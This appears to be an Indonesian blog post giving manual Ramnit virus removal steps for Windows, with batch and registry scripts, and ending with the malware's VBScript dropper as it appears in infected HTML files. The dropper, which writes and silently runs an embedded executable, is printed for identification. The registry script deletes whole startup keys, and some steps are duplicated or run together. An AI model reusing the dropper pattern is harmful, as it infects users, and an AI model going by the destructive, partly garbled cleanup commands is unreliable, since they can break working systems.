1. Jalankan Process explorer dari microsoft, click suspend all svchost.exe (Prosesnya di bawah explorer.exe, bukan yang dibawah services.exe, contoh ) kemudian terminate process tree
2. Disable system restore selama proses pembersihan.
3. Hapus recycler, recycled dan “system volume information” folders, Langkahnya sebagai berikut:
(sebagai contoh nama admin adalah pubercity, root directory di C:, dan data directory di D )
-run cmd.exe,2. Disable system restore selama proses pembersihan.
3. Hapus recycler, recycled dan “system volume information” folders, Langkahnya sebagai berikut:
(sebagai contoh nama admin adalah pubercity, root directory di C:, dan data directory di D )
c:\>rd /s /q “c:\recylcer” [enter]
c:\>cacls “c:\system volume information” /t /e /c /g pubercity:F [enter]
c:\>rd /s /q “c:\system volume information” [enter]
d:\>rd /s /q “recycled” [enter]
4. Buat Ramnit_removal.bat dan Ramnit_removal.reg dan letakkan pada path / folder yang sama. Untuk membuatnya langkahnyasebagai berikut:
Jalankan notepad, copy scripts di bawah dan save as Ramnit_removal.bat
@echo off
REM “Ini untuk Remove/delete Induk Virus”
del /f /s /q /a “%ProgramFiles%\Microsoft\WaterMark.exe”>Delete_Log.txt
del /f /s /q /a “%ProgramFiles%\Microsoft\DesktopLayer.exe”>>Delete_Log.txt
del /f /s /q /a “%systemroot%\System32\dmlconf.dat”>>Delete_Log.txt
REM “This is for erase another tricky worm files, if it exist”
del /f /s /q /a “%Systemroot%\dmlconf.dat”>>Delete_Log.txt
del /f /s /q /a “%Systemroot%\lssas.exe”>>Delete_Log.txt
del /f /s /q /a “%systemroot%\ExplorerSrv.exe”>>Delete_Log.txt
del /f /s /q /a “%systemroot%\System32\rundll32Srv.exe”>>Delete_Log.txt
del /f /s /q /a “%ProgramFiles%\synaptics\syntp\SynTPEnhSrv.exe”>>Delete_Log.txt
del /f /s /q /a “%UserProfile%\Local-Settings\Application Data\\.exe”>>Delete_Log.txt
REM “Ini untuk mencegah kembalinya virus”del /f /s /q /a “%UserProfile%\Local-Settings\Application Data\\.exe”>>Delete_Log.txt
mkdir “%ProgramFiles%\Microsoft\WaterMark.exe”
attrib +r +s -h -a “%ProgramFiles%\Microsoft\WaterMark.exe” /s /d
mkdir “%ProgramFiles%\Microsoft\DesktopLayer.exe”
attrib +r +s -h -a “%ProgramFiles%\Microsoft\DesktopLayer.exe” /s /d
mkdir “%systemroot%\System32\dmlconf.dat”
attrib +r +s -h -a “%systemroot%\System32\dmlconf.dat” /s /d
REM “Ini untuk mengembalikan registry settings”
reg import Ramnit_removal.reg
exit
Jalankan notepad, copy script di bawah dan save as Ramnit_removal.reg
Windows Registry Editor Version 5.00
[-HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
“Userinit”=”c:\\windows\\system32\\userinit.exe”
[HKEY_CLASSES_ROOT\regfile\shell\open\command]
@=”regedit.exe \”%1\”"
[HKEY_CLASSES_ROOT\inffile\shell\open\command]
@=hex(2):22,00,25,00,31,00,22,00,20,00,25,00,2a,00,00,00
[HKEY_CLASSES_ROOT\exefile]
@=”Application”
“EditFlags”=hex:38,07,00,00
“TileInfo”=”prop:FileDescription;Company;FileVersion”
“InfoTip”=”prop:FileDescription;Company;FileVersion;Create;Size”
[HKEY_CLASSES_ROOT\exefile\DefaultIcon]
@=”%1″
[HKEY_CLASSES_ROOT\exefile\shell]
[HKEY_CLASSES_ROOT\exefile\shell\open]
“EditFlags”=hex:00,00,00,00
[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@=”\”%1\” %*”
[HKEY_CLASSES_ROOT\exefile\shell\runas]
[HKEY_CLASSES_ROOT\exefile\shell\runas\command]
@=”\”%1\” %*”
5. Jalankan Ramnit_removal.bat, Sempurnakan pembenahan registry dengan smadav atau ccleaner.
6. Restart dan masuk safe mode (pada saat masuk boot tekan f8),kemudian scan dengan antivitus update., disarankan menggunakan kaspersky
6. Restart dan masuk safe mode (pada saat masuk boot tekan f8),kemudian scan dengan antivitus update., disarankan menggunakan kaspersky
7. Restart, bersihkan htm dan html file, ciri-ciri terinfeksi adalah saat file htm dan html dibuka dengan notepad, di bagian bawah/bottom terlihat script.
<SCRIPT language=”VBScript”><! –
DropFileName = “svchost.exe”
WriteData = “4D5A90000300000004000000FFFF0000B8000000 // very long here…
Set FSO = CreateObject(“Scripting.FileSystemObject”)
DropPath = FSO.GetSpecialFolder(2) & “\” & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng(“&H” & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject(“WScript.Shell”)
WSHshell.Run DropPath, 0
//–>
No comments:
Konversi Kode di Sini! Back to Top